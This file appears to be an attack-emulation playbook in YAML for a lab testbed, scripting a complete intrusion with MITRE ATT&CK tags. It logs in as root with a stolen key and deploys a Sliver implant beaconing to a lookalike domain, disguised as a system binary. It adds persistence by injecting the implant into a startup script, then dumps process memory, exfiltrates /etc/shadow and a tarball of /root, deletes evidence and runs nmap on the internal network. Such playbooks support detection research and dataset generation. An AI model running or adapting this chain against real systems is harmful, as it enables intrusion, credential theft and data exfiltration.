####################
#
# Scenario 2 a a
#
####################

vars:
  $SERVER_ADDRESS: 192.42.0.254
  $ATTACKER_ADDRESS: 192.42.1.174
  $DNS_SERVER: 192.42.0.233
  $DOMAIN: aecid-testbed.com
  $USER: aecid
  $SSH_KEY: "{{user_home.stdout}}/.ssh/privesc_key_videoserver"
  $IMPLANTPATH: /tmp/superimplant
  NETWORK: "172.17.100.0/24"

commands:
  - type: ssh
    cmd: hostname
    hostname: $SERVER_ADDRESS
    port: 2222
    username: root
    key_filename: $SSH_KEY
    creates_session: "root"
    metadata:
      techniques: "T1021"
      tactics: "Lateral Movement"

  - type: sliver
    cmd: "generate_implant"
    c2url: "https://faaacebook.com"
    name: "superimplant"

  - type: sliver
    cmd: start_https_listener
    host: 0.0.0.0
    port: 443
    metadata:
      techniques: "T1071,T1573"
      tactics: "Command and Control"

  - type: shell
    cmd: ls $IMPLANTPATH

  - type: sftp
    cmd: put
    local_path: "$LAST_SLIVER_IMPLANT"
    remote_path: /usr/bin/zmcontroller
    mode: "755"
    session: "root"
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"

  - type: ssh
    cmd: sed -i 's/#!\/bin\/sh/#!\/bin\/sh\n\/usr\/bin\/zmcontroller \&\n/' /usr/share/awffull/awffull
    session: "root"
    metadata:
      techniques: "T1547,T1569"
      tactics: "Persistence,Execution"

  - type: sliver-session
    cmd: ls
    remote_path: "."
    session: superimplant
    metadata:
      techniques: "T1083"  
      tactics: "Discovery"

  - type: sliver-session
    cmd: ps
    session: superimplant
    metadata:
      techniques: "T1057"
      tactics: "Discovery"

  - type: regex
    cmd: (\d+) .*mariadb
    output:
      PROCESS: "$MATCH_0"
    metadata:
     techniques: "T1007"  
     tactics: "Discovery" 

  - type: debug
    cmd: "$PROCESS"

  - type: mktemp
    variable: TEMPPROCDUMP

  - type: sliver-session
    cmd: process_dump
    pid: 1
    session: superimplant
    local_path: $TEMPPROCDUMP
    metadata:
      techniques: "T1003"
      tactics: "Credential Access"

  - type: sliver-session
    cmd: netstat
    session: superimplant
    metadata:
      techniques: "T1049"
      tactics: "Discovery"

  - type: sliver-session
    cmd: ifconfig
    session: superimplant
    metadata:
      techniques: "T1082"
      tactics: "Discovery"

  - type: mktemp
    variable: SHADOW

  - type: sliver-session
    cmd: download
    remote_path: /etc/shadow
    local_path: $SHADOW
    session: superimplant
    metadata:
      techniques: "T1552,T1005,T1041"
      tactics: "Credential Access,Collection,Exfiltration"

  - type: sliver-session
    cmd: execute
    exe: /usr/bin/tar
    args:
      - cvzf
      - /tmp/r.tar.gz
      - /root
    session: superimplant
    metadata:
      techniques: "T1560,T1074,T1005"
      tactics: "Collection,Exfiltration"

  - type: mktemp
    variable: ROOTTAR

  - type: mktemp
    variable: ROOTTAR2

  - type: sliver-session
    cmd: download
    remote_path: /tmp/r.tar.gz
    local_path: $ROOTTAR
    session: superimplant
    metadata:
      techniques: "T1041"
      tactics: "Exfiltration"

  - type: sliver-session
    cmd: rm
    remote_path: /tmp/r.tar.gz
    session: superimplant
    metadata:
      techniques: "T1070"
      tactics: "Defense Evasion"

  - type: sliver-session
    cmd: download
    remote_path: /root
    local_path: $ROOTTAR2
    recurse: True
    session: superimplant
    metadata:
      techniques: "T1005"
      tactics: "Collection"

  - type: sliver-session
    cmd: execute
    exe: cat
    args:
      - /etc/pam.d/common-password
    session: superimplant
    metadata:
      techniques: "T1201"
      tactics: "Discovery"

  - type: sliver-session
    cmd: execute
    exe: cat
    args:
      - /etc/passwd
    session: superimplant
    metadata:
      techniques: "T1087"
      tactics: "Discovery"

  - type: sliver-session
    cmd: execute
    exe: chage
    args:
      - -l
      - $USER
    session: superimplant
    metadata:
      techniques: "T1201"
      tactics: "Discovery"

  - type: sliver-session
    cmd: upload
    local_path: /var/www/html/nmap
    remote_path: /tmp/nmap
    session: superimplant
    metadata:
      techniques: "T1105"
      tactics: "Command and Control"

  - type: sliver-session
    cmd: execute
    exe: chmod
    args:
      - "755"
      - /tmp/nmap
    session: superimplant
    metadata:
      techniques: "T1106"
      tactics: "Execution"

  - type: sliver-session
    cmd: execute
    exe: /tmp/nmap
    args:
      - 172.17.100.0/24
    session: superimplant
    metadata:
      techniques: "T1046,T1018"
      tactics: "Discovery"

